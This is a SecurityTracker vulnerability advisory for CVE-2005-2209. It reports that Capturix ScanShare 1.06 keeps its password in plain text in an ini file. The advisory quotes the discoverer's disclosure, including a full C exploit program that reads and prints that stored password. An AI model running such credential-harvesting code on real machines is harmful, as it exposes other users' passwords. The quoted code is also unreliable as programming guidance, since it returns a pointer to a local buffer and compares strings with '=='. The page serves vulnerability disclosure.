SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   Capturix ScanShare Vendors:   Captaris
Capturix ScanShare Discloses Password to Local Users
SecurityTracker Alert ID:  1014409
SecurityTracker URL:  http://securitytracker.com/id/1014409
CVE Reference:   CVE-2005-2209   (Links to External Site)
Updated:  Jun 16 2008
Original Entry Date:  Jul 7 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 1.06 build 50; possibly earlier versions
Description:   Kozan reported a vulnerability in Capturix ScanShare. A local user can obtain the password.

The software stores the configuration data and password in plain text form in the '\[Windows_Path]\capturixss_cfg.ini' file. A local user can view the file to obtain the password.
Impact:   A local user can obtain the password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.capturix.com/default.asp?product=css (Links to External Site)
Cause:   Access control error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Wed, 06 Jul 2005 14:36:28 +0300
Subject:  Capturix ScanShare discloses passwords to local users


---------------------
Application:
---------------------


Capturix ScanShare 1.06 build 50 (and probably prior verisons)


---------------------
Introduction:
---------------------

Share a scanner device over the network. With this application
you can share any compatible scanner (TWAIN) over the network
and use it also as a copy machine. This enables users to access
your scanner via browser and scan documents, and take copies using
the printer connected to the PC that is sharing the scanner.

Vendor: Capturix Software Technologies
www.capturix.com


---------------------
Bug:
---------------------


Capturix ScanShare configuration data and password in
"X:\[Windows_Path]\capturixss_cfg.ini" in with plain text format
without crypting and can be viewed by a local user.


---------------------
Vendor Confirmed:
---------------------

No.


---------------------
Fix:
---------------------

There is no solution at the time of this entry.



---------------------
Exploit:
---------------------


/*****************************************************************

Capturix ScanShare 1.06 Local Password Disclosure Exploit by Kozan

Application: Capturix ScanShare 1.06 build 50
(and probably prior verisons)
Vendor: Capturix Software Technologies
www.capturix.com

Vulnerable Description: Capturix ScanShare discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <windows.h>
#include <stdio.h>

int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               fclose(di);
               return -1;
       }

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i<strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i>0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i > ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

char *oku(char *FilePath,char *Str)
{
       FILE *di;
       char cr;
       int i=0;
       char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 ) return "";

       if( (di=fopen(FilePath,"rb")) == NULL ) return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       while(!feof(di))
       {
               cr=getc(di);
               if(cr == 0x0D) break;
               Feature[i] = cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}

int main()
{
	char Password[MAX_PATH], PasswordTemp[MAX_PATH];
	char WindowsPath[MAX_PATH], PwdFilePath[MAX_PATH];
	GetWindowsDirectory(WindowsPath,MAX_PATH);
	lstrcpy(PwdFilePath, WindowsPath);
	lstrcat(PwdFilePath,"\\capturixss_cfg.ini");

	lstrcpy(PasswordTemp, oku(PwdFilePath,"Password="));
	if(PasswordTemp=="") lstrcpy(Password, "Not Found!");
	else lstrcpy(Password, PasswordTemp);

	fprintf( stdout, "Capturix ScanShare 1.06 Local Exploit by Kozan\n" );
	fprintf( stdout, "Credits to AtmaCA\n" );
	fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
	fprintf( stdout, "kozan@netmagister.com\n\n" );
	fprintf( stdout, "Password\t: %s\n", Password );

	return 0;
}




Kozan...


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC